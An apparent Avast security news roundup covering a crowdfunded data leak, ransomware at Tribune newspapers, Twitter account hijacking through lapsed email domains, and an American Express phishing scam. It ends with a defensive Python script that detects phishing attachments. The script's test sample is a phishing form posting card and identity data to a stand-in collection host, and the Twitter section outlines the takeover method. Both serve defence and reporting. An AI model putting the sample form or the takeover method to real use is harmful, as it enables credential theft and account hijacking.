The Dark Overlord, Twitter hijackers, and other bad guys
The year’s news kicks off with cyberattacks, terrorism, and phishing. Stay strong.
Crowdfunding for evil
The hacker or cybergang calling itself The Dark Overlord has started the new year on a dark note, announcing Wednesday that it is crowdfunding the release of sensitive legal documents linked to the 9/11 attacks, which it claims to have stolen from the international insurers Hiscox and Lloyd’s of London. As the crowdfunding campaign hits each bitcoin milestone, The Dark Overlord promises to release increasingly juicy documents, claiming to have poached over 18,000 relevant files. Both insurers say that their own systems were not breached and that the data was stolen from associated law firms. The Dark Overlord made news in 2017 when it released Orange is the New Black episodes ahead of their official premiere after Netflix refused to pay an extortion demand.
Newspapers under cyberattack
Tribune Publishing, one of the largest US media groups, suffered a cyberattack over the weekend that caused delays and missing sections in dozens of city newspapers across the country, including The Chicago Tribune, The Baltimore Sun, and The New York Daily News. The Los Angeles Times and The San Diego Union-Tribune, although sold by Tribune Publishing earlier in 2018, still share its printing infrastructure and were hit by the same attack. The media group has given no details beyond saying that malware was involved and that only print production was affected; websites and apps kept running normally. Sources inside Tribune have reportedly attributed the disruption to a Ryuk ransomware infection. Back in October, we reported on Ryuk ransomware taking down a North Carolina water utility.
“At this time it is still unclear who was behind the attack and what the attacker’s goal was,” comments Luis Corrons, Avast security evangelist. “However, the ability to stop newspapers from getting printed, or even scarier, being able to change what gets printed without being noticed, could point to some really advanced attack – maybe state sponsored.”
Twitter hijackers return
An old trend is new again. Twitter has had problems with hijacked accounts in the past, and the trend has recently resurfaced. Terrorists appear to have caught on to a long-standing gap in Twitter’s account security: until June 2018, Twitter did not require new users to verify the email address they signed up with. An abandoned account tied to an email address that was never created, or whose domain has since lapsed, can be taken over by registering that address and requesting a password reset, and many such accounts still carry their original followers, some numbering in the tens of thousands. In recent weeks, a number of dormant accounts came back to life, all posting extreme terrorist propaganda. Security researchers have been working with Twitter to identify the hijacked accounts, and Twitter has already taken down a number of them.
American Express phishing
A common phishing scam landing in inboxes lately pretends to come from American Express. The email claims there is an issue with the recipient’s card and prompts them to open an attachment. The attachment is an HTML file that opens in the browser and presents a form asking for a host of personal data, including card details, mother’s maiden name, mother’s date of birth, first elementary school, and more. When the user submits the form, the data is posted to a server controlled by the criminals, and the user is then redirected to a genuine American Express “thank you” page so that nothing looks amiss.
“This is the classic, old-fashioned phishing attack,” points out Corrons. “As always there is one rule to heed here: whenever we receive a message that looks like it is in fact from our bank and that email asks us to enter any kind of information, NEVER ever click on any link or open an attachment that is in that message. Instead, always open your browser and go to your bank’s site by entering its URL manually. Dodging an attack really can be that simple.”
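As an added example (not code from the article or from Avast), here is a small offline triage script for the kind of attachment described above. It parses an HTML attachment, flags any form whose action posts somewhere other than the brand's own domain, and lists the fields that ask for card or identity data a bank would never request by email. The sample attachment, the legitimate-looking control form, and the collection domain amex-verify.example.net are all constructed for this example.

```python
"""Offline triage of an HTML e-mail attachment for credential-phishing forms.

Added example, not code from the original article. It inspects an HTML
attachment without rendering it: every <form> whose action posts off the
brand's own domain, and every input field that asks for card or identity
data, is reported. The sample attachments and the collection domain below
are constructed for the example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field-name tokens that a legitimate card-issuer page has no reason to
# collect in an e-mailed form (constructed list, extend as needed).
SENSITIVE_TOKENS = {
    "card", "cardnumber", "cvv", "cvv2", "ssn", "maiden", "dob",
    "school", "pin",
}

# Domains the mail claims to come from; anything else receiving the form is foreign.
BRAND_DOMAINS = ["americanexpress.com"]


class FormScanner(HTMLParser):
    """Collect every form's action URL and the names of the fields inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []        # list of {"action": str, "fields": [names]}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            self._current["fields"].append(a.get("name") or a.get("id") or "")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def _host_of(url):
    return (urlparse(url).hostname or "").lower()


def _belongs_to(host, brand_domains):
    return any(host == d or host.endswith("." + d) for d in brand_domains)


def _is_sensitive(field_name):
    # Split camelCase-insensitive names on non-alphanumerics: "mothers_maiden_name" -> maiden
    tokens = set(re.split(r"[^a-z0-9]+", field_name.lower()))
    return bool(tokens & SENSITIVE_TOKENS)


def triage_attachment(html, brand_domains=BRAND_DOMAINS):
    """Return findings for an HTML attachment claiming to come from brand_domains."""
    scanner = FormScanner()
    scanner.feed(html)
    findings = {"foreign_actions": [], "sensitive_fields": [], "verdict": "clean"}
    for form in scanner.forms:
        host = _host_of(form["action"])
        # An absolute action pointing off-brand is the classic credential drop;
        # a relative action inside a local file posts nowhere useful and is ignored.
        if host and not _belongs_to(host, brand_domains):
            findings["foreign_actions"].append(host)
        findings["sensitive_fields"].extend(n for n in form["fields"] if _is_sensitive(n))
    if findings["foreign_actions"] and findings["sensitive_fields"]:
        findings["verdict"] = "phishing"
    elif findings["foreign_actions"] or findings["sensitive_fields"]:
        findings["verdict"] = "suspicious"
    return findings


# Constructed sample: the attachment described in the article, with an invented drop host.
SAMPLE_ATTACHMENT = """
<html><body>
<h2>American Express - Verify your card</h2>
<form method="post" action="https://amex-verify.example.net/collect.php">
  <input name="cardNumber"><input name="cvv2"><input name="exp">
  <input name="mothers_maiden_name"><input name="mother_dob">
  <input name="first_school"><input type="submit" value="Continue">
</form>
</body></html>
"""

# Constructed control: an ordinary login form posting to the brand's own domain.
LEGIT_FORM = """
<form method="post" action="https://www.americanexpress.com/login">
  <input name="username"><input name="password">
</form>
"""

if __name__ == "__main__":
    print(triage_attachment(SAMPLE_ATTACHMENT))   # verdict: phishing
    print(triage_attachment(LEGIT_FORM))          # verdict: clean
```

The check deliberately ignores the page's branding and text: logos and wording are trivial to copy, while where the form posts and what it asks for are the two things a phisher cannot disguise without breaking the scam.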
Avast is a global leader in cybersecurity, protecting hundreds of millions of users around the world. Safeguard your privacy and encrypt your online connection with SecureLine VPN.